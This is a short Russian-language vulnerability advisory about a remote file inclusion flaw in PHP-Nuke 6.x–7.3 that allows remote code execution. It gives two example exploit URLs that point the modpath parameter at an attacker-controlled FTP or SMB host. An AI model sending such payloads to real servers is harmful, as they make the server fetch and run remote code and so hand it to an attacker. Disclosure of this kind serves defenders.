Удаленное выполнение произвольного кода в PHP-Nuke

Дата публикации:
19.05.2004
Всего просмотров:
1668
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PHP-Nuke 6.x - 7.3

Описание: Уязвимость включения файла обнаружена в PHP-Nuke. Удаленный пользователь может выполнить произвольный код на целевой системе.

Пример/Эксплоит:

http://localhost/nuke73/index.php?modpath=ftp://[attacker]/directory/
http://localhost/nuke73/index.php?modpath=//attacke r_ip/share_name/

URL производителя: http://www.phpnuke.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: IRIX 6.5.24 rpc.mountd infinte loop

или введите имя

CAPTCHA